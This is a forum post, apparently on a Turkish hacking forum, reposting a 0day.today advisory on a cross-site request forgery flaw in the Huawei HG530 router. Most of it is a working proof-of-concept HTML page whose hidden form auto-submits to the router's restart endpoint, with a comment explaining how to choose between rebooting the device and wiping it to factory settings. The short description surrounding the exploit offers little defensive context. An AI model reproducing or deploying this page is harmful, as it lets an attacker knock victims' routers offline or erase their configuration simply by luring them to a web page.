Hoşgeldin Misafir

Huawei HG530 Cross Site Request Forgery Vulnerability

NasyoneL

NasyoneL

Karanlık Özgürlüktür
Forum Yöneticisi
25 Ağu 2017
42,664 Mesaj
TIM Görevleri
1

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
PHP:
Multiple CSRF reboot and restore Vulnerability
 
===========================
 
The Huawei HG530 suffers from multiple CSRF vulnerability allows local
attackers to reboot the device or to restore to factory Configuration.
 
==================
 
The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'
 
====================
 
Security issue PoC :
 
<html>
 
<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"
id='test' >
 
<input type="hidden" name="defaltRomFlag" value="0">
 
<input type="hidden" name="defaultIpFactory" value="192.168.1.1">
 
 
 
<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">
 
 
 
 
 
</form>
 
<script>
 
document.getElementById('test').submit();
 
</script>
 
</html>
 
//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot
 
#  0day.today [2019-07-10]  #
 
Geri
Üst